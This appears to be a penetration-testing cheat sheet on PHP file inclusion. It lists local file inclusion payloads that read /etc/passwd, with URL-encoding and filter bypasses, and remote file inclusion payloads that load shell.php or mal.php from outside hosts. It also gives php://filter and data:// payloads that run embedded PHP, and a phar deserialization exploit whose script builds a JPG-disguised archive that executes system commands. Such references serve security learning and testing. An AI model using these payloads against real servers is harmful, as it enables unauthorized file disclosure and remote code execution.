File Inclusion
File inclusion
A vulnerability that allows attackers to access private resources.
Local File Inclusion (LFI)
The server loads a local file.
Basic LFI and bypasses
http://domain.com/index.php?page=../../../etc/passwd
URL encoding
One can try to URL encode the path either once or numerous times.
http://domain.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://domain.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://domain.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://domain.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
Filter bypasses
http://domain.com/index.php?page=....//....//etc/passwd
http://domain.com/index.php?page=..///////..////..//////etc/passwd
http://domain.com/index.php?page=PhP://filter
Remote File Inclusion (RFI)
The server loads a file which is hosted on another server.
RFI can only take place if allow_url_include
is turned on.
Basic RFI and bypasses
http://domain.com/index.php?page=http://remote.com/shell.php
http://domain.com/index.php?page=\\remote.com\shell.phpattacker.com\mal.php
PHP wrappers
php://filter
PHP filters allow one to perform modification on data before it's being read by the server. Some of the techniques below can be used to bypass restrictions and filters set by the server.
# BASE64 encode data
http://domain.com/index.php?page=php://filter/convert.base64-decode/resource=/etc/passwd);
data://
http://domain.com/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://domain.com/?page=data://text/plain,<?php phpinfo(); ?>
phar:// and phar deserialisation
A .phar
file is a PHP archive. One can upload such file and execute code when it is being loaded.
It contains metadata in a serialised format. When parsed on the server said metadata gets deserialised.
Even if the source code on the server is not using the eval
function, the following other methods will still invoke the vulnerability. file_get_contents()
,fopen()
,file()
,file_exists()
,md5_file()
,filemtime()
,filesize()
Exploitation
Pretend that this is the source code of the server.
# server.php <?php class ReadFile{ public $data = null; public function __construct($data) { $this->data = $data; } function __destruct() { system($this->data); } } file_get_contents("phar://pwned.phar"); ?>
This is the code that will make the phar file.
# make_phar.php <?php class ReadFile{ public $data = null; public function __construct($data) { $this->data = $data; } function __destruct() { system($this->data); } } # Make phar $phar = new Phar('pwned.phar'); $phar->startBuffering(); $phar->addFromString('test.txt', 'text'); $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>"); # Add object of class as metadata $object = new ReadFile('whoami'); $phar->setMetadata($object); $phar->stopBuffering(); ?>
Magic bytes of JPG \xff\xd8\xff
have been added to the phar file to bypass file upload restrictions
Compile
pwned.phar
with:php --define phar.readonly=0 make_phar.php
References
Last updated